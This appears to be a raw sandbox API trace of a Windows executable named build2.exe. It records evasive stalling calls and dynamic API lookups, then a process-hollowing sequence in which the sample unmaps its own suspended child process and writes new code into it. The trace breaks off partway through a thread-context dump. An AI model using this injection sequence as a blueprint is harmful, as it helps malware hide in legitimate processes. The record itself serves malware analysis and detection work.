0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.454] GetLastError () returned 0x0 [0116.454] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.455] SetLastError (dwErrCode=0x0) [0116.455] GetLastError () returned 0x0 [0116.778] LoadLibraryA (lpLibFileName="msimg32.dll") returned 0x738c0000 [0116.965] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0116.965] GetProcAddress (hModule=0x752b0000, lpProcName="GlobalAlloc") returned 0x752c5846 [0116.965] GetProcAddress (hModule=0x752b0000, lpProcName="GetLastError") returned 0x752c11c0 [0116.965] GetProcAddress (hModule=0x752b0000, lpProcName="Sleep") returned 0x752c10ff [0116.965] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0116.965] GetProcAddress (hModule=0x752b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x752e7327 [0116.965] GetProcAddress (hModule=0x752b0000, lpProcName="Module32First") returned 0x75346279 [0116.966] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0116.966] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0116.969] Module32First (hSnapshot=0x5c, lpme=0x18cf44) returned 1 [0116.970] VirtualAlloc (lpAddress=0x0, dwSize=0x453a0, flAllocationType=0x1000, flProtect=0x40) returned 0x220000 [0116.977] LoadLibraryA (lpLibFileName="user32") returned 0x76860000 [0116.977] GetProcAddress (hModule=0x76860000, lpProcName="MessageBoxA") returned 0x768cfd1e [0116.978] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageExtraInfo") returned 0x7689ed76 [0116.978] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000 [0116.978] GetProcAddress (hModule=0x752b0000, lpProcName="WinExec") returned 0x75343051 [0116.978] GetProcAddress (hModule=0x752b0000, lpProcName="CreateFileA") returned 0x752c537e [0116.978] GetProcAddress (hModule=0x752b0000, lpProcName="WriteFile") returned 0x752c1282 [0116.978] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0116.978] GetProcAddress (hModule=0x752b0000, lpProcName="CreateProcessA") returned 0x752c1072 [0116.978] GetProcAddress (hModule=0x752b0000, lpProcName="GetThreadContext") returned 0x752e799c [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocEx") returned 0x752dd980 [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualFree") returned 0x752c184e [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="ReadProcessMemory") returned 0x752dcfa4 [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="WriteProcessMemory") returned 0x752dd9b0 [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadContext") returned 0x75345933 [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="ResumeThread") returned 0x752c43a7 [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForSingleObject") returned 0x752c1136 [0116.979] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleFileNameA") returned 0x752c1491 [0116.980] GetProcAddress (hModule=0x752b0000, lpProcName="GetCommandLineA") returned 0x752c5159 [0116.980] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f00000 [0116.980] GetProcAddress (hModule=0x76f00000, lpProcName="NtUnmapViewOfSection") returned 0x76f1fc70 [0116.980] GetProcAddress (hModule=0x76f00000, lpProcName="NtWriteVirtualMemory") returned 0x76f1fe04 [0116.980] GetProcAddress (hModule=0x76860000, lpProcName="RegisterClassExA") returned 0x7687db98 [0116.980] GetProcAddress (hModule=0x76860000, lpProcName="CreateWindowExA") returned 0x7687d22e [0116.980] GetProcAddress (hModule=0x76860000, lpProcName="PostMessageA") returned 0x76883baa [0116.981] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageA") returned 0x76877bd3 [0116.981] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcA") returned 0x76f424e0 [0116.981] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileAttributesA") returned 0x752c53cc [0116.981] GetProcAddress (hModule=0x752b0000, lpProcName="GetStartupInfoA") returned 0x752c0e00 [0116.981] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtectEx") returned 0x75344b5f [0116.981] GetProcAddress (hModule=0x752b0000, lpProcName="ExitProcess") returned 0x752c79c8 [0116.981] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0116.982] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0116.982] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0116.982] RegisterClassExA (param_1=0x18cc00) returned 0x3ec1ca [0116.983] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x80042 [0117.006] PostMessageA (hWnd=0x80042, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0117.006] GetMessageA (in: lpMsg=0x18cc30, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18cc30) returned 1 [0117.007] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x270000 [0117.007] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x270000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe")) returned 0x50 [0117.008] GetStartupInfoA (in: lpStartupInfo=0x18cb54 | out: lpStartupInfo=0x18cb54*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0117.008] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe\" " [0117.008] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18cb54*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18cbac | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe\" ", lpProcessInformation=0x18cbac*(hProcess=0x78, hThread=0x74, dwProcessId=0xf20, dwThreadId=0xf24)) returned 1 [0117.024] VirtualFree (lpAddress=0x270000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.025] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x270000 [0117.025] GetThreadContext (in: hThread=0x74, lpContext=0x270000 | out: lpContext=0x270000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x40b990, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0117.032] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18cba0, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18cba0*, lpNumberOfBytesRead=0x0) returned 1 [0117.032] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0117.037] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x59000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0117.037] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x2215a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x2215a0*, NumberOfBytesWritten=0x0) returned 0x0 [0117.039] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x2219a0*, NumberOfBytesToWrite=0x34000, NumberOfBytesWritten=0x0 | out: Buffer=0x2219a0*, NumberOfBytesWritten=0x0) returned 0x0 [0117.044] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x435000, Buffer=0x2559a0*, NumberOfBytesToWrite=0xde00, NumberOfBytesWritten=0x0 | out: Buffer=0x2559a0*, NumberOfBytesWritten=0x0) returned 0x0 [0117.045] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x443000, Buffer=0x2637a0*, NumberOfBytesToWrite=0x1c00, NumberOfBytesWritten=0x0 | out: Buffer=0x2637a0*, NumberOfBytesWritten=0x0) returned 0x0 [0117.046] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x2216bc*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2216bc*, lpNumberOfBytesWritten=0x0) returned 1 [0117.047] SetThreadContext (hThread=0x74, lpContext=0x270000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x41fe8c, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, 